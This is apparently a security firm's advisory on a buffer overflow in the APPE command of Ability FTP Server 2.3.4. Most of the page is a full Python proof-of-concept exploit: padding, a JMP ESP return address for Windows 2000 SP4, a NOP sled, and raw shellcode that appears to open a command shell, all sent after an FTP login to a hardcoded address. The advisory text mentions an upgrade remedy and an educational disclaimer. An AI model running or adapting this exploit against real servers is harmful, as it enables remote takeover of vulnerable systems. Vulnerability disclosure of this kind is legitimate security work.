Buffer Overflow in Ability FTP
A vulnerability has been discovered in Code Crafter's Ability FTP server version 2.3.4. This vulnerability is a buffer overflow found to be a remotely exploitable weakness in the APPE command. An attacker could craft packets and with the use of shellcode, overflow the buffer and gain root privileges on the vulnerable system.
The vendor has been notified of this vulnerability. The suggested remediation path from the vendor is to upgrade to the latest version of Ability FTP Server. Proof-of-concept code has been identified in the wild and as a result the vendor suggests upgrading to the most recent version of Ability FTP Server immediately.
Below is proof-of-concept code written in Python. The EIP address is for Windows 2000 Service Pack 4. The proof-of-concept code contained here is strictly for educational purposes only.
#!/usr/bin/python
#########################################
#########################################
## ##
## Ability FTP Buffer Overflow ##
## ##
## Requirements: ##
## Ability FTP Server 2.3.4 ##
## ##
## ##
## FOR EDUCATIONAL PURPOSES ONLY! ##
## ##
## Jeremiah Talamantes ##
## labs@redteamsecure.com ##
## http://www.redteamsecure.com/labs ##
## ##
#########################################
#########################################
import socket
# Fill buffer
buffer="\x41"*966
# Jump ESP from shell32.dll (7ca58265)
# Change as needed
buffer+="\x65\x82\xa5\x7c"
buffer+="\x43"*16
# NOPS sled
buffer+="\x90"*16
# Replace with your own shellcode
buffer+=("\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x11\x5c\x66"
"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51"
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0"
"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93"
"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66"
"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38"
"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57"
"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9"
"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83"
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6"
"\xff\xd0")
buffer+="\xCC"*950
# Socket connect to FTP port
# Send buffer payload over with APPE command
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# Change IP Address as needed
connect=s.connect(('192.168.9.97',21))
s.recv(1024)
s.send('USER ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
s.send('APPE '+buffer+'\r\n')
#s.recv(1024)
#s.send('QUIT\r\n')
s.close()
File attachment 1: Download here
Categories
Contact Us
Phone number:
1-612-234-7848
E-mail: